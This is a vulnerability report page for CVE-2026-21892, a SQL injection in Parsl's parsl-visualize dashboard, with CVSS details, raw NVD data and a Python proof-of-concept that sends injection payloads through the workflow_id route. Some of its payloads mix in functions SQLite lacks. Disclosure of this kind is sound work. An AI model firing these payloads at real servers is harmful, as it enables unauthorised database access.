Security Vulnerability Report
中文
CVE-2026-21892 CVSS 5.3 MEDIUM

CVE-2026-21892

Published: 2026-01-08 14:15:58
Last Modified: 2026-01-20 18:28:39
Source: [email protected]

Description

Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:uchicago:parsl:*:*:*:*:*:python:*:* - VULNERABLE
Parsl < 2026.01.05 (parsl-visualize组件)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib3 urllib3.disable_warnings() # CVE-2026-21892 SQL Injection PoC for Parsl parsl-visualize # Target: Parsl parsl-visualize component < 2026.01.05 target = "http://target-server:5000" # Basic SQL injection test - extract database version payloads = [ "' OR '1'='1", "' UNION SELECT NULL,version(),NULL-- ", "' UNION SELECT NULL,user(),NULL FROM sqlite_master-- ", "1' AND 1=1-- ", "1' AND 1=2-- " ] def test_sql_injection(target_url, workflow_id): """Test SQL injection with given workflow_id""" url = f"{target_url}/workflow/{workflow_id}" try: response = requests.get(url, timeout=10) return { "payload": workflow_id, "status_code": response.status_code, "response_length": len(response.text), "success": response.status_code != 500 } except requests.exceptions.RequestException as e: return {"payload": workflow_id, "error": str(e)} # Run PoC print("Testing CVE-2026-21892 SQL Injection...") for payload in payloads: result = test_sql_injection(target, payload) print(f"Payload: {payload}") print(f"Result: {result}\n")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21892", "sourceIdentifier": "[email protected]", "published": "2026-01-08T14:15:57.553", "lastModified": "2026-01-20T18:28:39.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue."}, {"lang": "es", "value": "Parsl es una biblioteca de scripting paralelo de Python. Una vulnerabilidad de inyección SQL existe en el componente parsl-visualize de versiones anteriores a 2026.01.05. La aplicación construye consultas SQL utilizando formato de cadena inseguro (operador % de Python) con entrada proporcionada por el usuario (workflow_id) directamente desde rutas URL. Esto permite a un atacante no autenticado con acceso al panel de visualización inyectar comandos SQL arbitrarios, lo que podría llevar a la exfiltración de datos o a la denegación de servicio contra la base de datos de monitoreo. La versión 2026.01.05 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uchicago:parsl:*:*:*:*:*:python:*:*", "versionEndExcluding": "2026.01.05", "matchCriteriaId": "834A40DA-5C88-414B-9EFE-BC593FC7C4D5"}]}]}], "references": [{"url": "https://github.com/Parsl/parsl/commit/013a928461e70f38a33258bd525a351ed828e974", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Parsl/parsl/security/advisories/GHSA-f2mf-q878-gh58", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Parsl/parsl/security/advisories/GHSA-f2mf-q878-gh58", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.